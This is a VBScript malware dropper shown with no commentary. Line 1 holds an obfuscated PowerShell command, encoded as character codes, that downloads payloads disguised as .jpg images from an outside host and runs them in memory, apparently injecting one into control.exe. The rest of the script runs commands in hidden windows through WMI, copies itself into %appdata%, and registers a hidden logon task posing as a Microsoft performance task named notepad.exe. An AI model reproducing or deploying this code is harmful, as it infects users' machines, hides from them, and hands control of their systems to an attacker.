f="$Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,10

1. f="$Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,119,119,119,46,109,57,99,46,110,101,116,47,117,112,108,111,97,100,115,47,49,53,54,49,55,53,54,50,57,56,49,46,106,112,103,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,119,119,119,46,109,57,99,46,110,101,116,47,117,112,108,111,97,100,115,47,49,53,54,49,55,53,54,51,56,56,49,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,64,36,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,99,111,110,116,114,111,108,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEX"
2. exec("Powershell"+space(1)+f)
3. Set Moha = CreateObject(StrReverse(replace("lleh|.tpirc|W","|","S")))
4. N="notepad.exe"
5. set fso0 = CreateObject("Scripting.FileSystemObject")
6. CurrentDirectory = Moha.CurrentDirectory
7. sname= wsh.scriptname
8. startupfolder=Moha.ExpandEnvironmentStrings("%appdata%")
9. F=Moha.ExpandEnvironmentStrings("%appdata%")+ "\" + sname
10.  
11. task F,N
12. if CurrentDirectory = startupfolder Then
13.  
14. WScript.Quit()
15. else
16.  
17. mnb()
18. End if
19.  
20. sub mnb()
21.  
22.  
23. If (fso0.FileExists(CurrentDirectory+ "\"+ sname)) Then
24. sSourceFile = CurrentDirectory+ "\"+ sname
25.  
26. sCmd = "cmd /c copy """ & sSourceFile & """ """ & startupfolder & """ /Y"
27. exec(sCmd)
28.  
29. WScript.Quit()
30. Else
31. WScript.Quit()
32. End If
33.  
34. End sub
35.  
36. sub task(PATH,TSname)
37.  
38. dim strUser
39. strUser = CreateObject("WScript.Network").UserName
40. Dim service
41. Set service = CreateObject( "Schedule.Service" )
42. call service.Connect()
43. Dim rootFolder
44. Set rootFolder = service.GetFolder("\")
45. Dim taskDefinition
46. Set taskDefinition = service.NewTask(0)
47. ' taskDefinition.principal.LogonType = 3
48. Dim regInfo
49. Set regInfo = taskDefinition.RegistrationInfo
50. regInfo.Description = "System performance enhancment"
51. regInfo.Author = "Microsoft"
52. Dim settings
53. Set settings = taskDefinition.Settings
54. settings.Enabled = True
55. settings.StartWhenAvailable = True
56. settings.Hidden = True
57. settings.DisallowStartIfOnBatteries = False
58.  
59. const TriggerTypeLogon = 9
60. Dim triggers
61. Set triggers = taskDefinition.Triggers
62. Dim trigger
63. Set trigger = triggers.Create(TriggerTypeLogon)
64. Dim startTime, endTime
65. startTime = "2010-05-02T10:49:02"
66. endTime = "2060-05-02T10:52:02"
67. trigger.Id = "LogonTriggerId"
68. trigger.UserId = strUser
69. trigger.StartBoundary = startTime
70. trigger.EndBoundary = endTime
71. trigger.Enabled = True
72. const ActionTypeExecutable = 0
73. Dim Action
74. Set Action = taskDefinition.Actions.Create( ActionTypeExecutable )
75. Action.Path = PATH
76. const createOrUpdateTask = 6
77. call rootFolder.RegisterTaskDefinition( _
78. TSname, taskDefinition, createOrUpdateTask, _
79. , , 3)
80.  
81. End sub
82. sub exec(Atc)
83. strCommand = Atc
84. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
85. Set objStartup = objWMIService.Get("Win32_ProcessStartup")
86. Set objConfig = objStartup.SpawnInstance_
87. objConfig.ShowWindow = 0
88. Set objProcess = objWMIService.Get("Win32_Process")
89. intReturn = objProcess.Create(strCommand, Null, objConfig, intProcessID)
90. End sub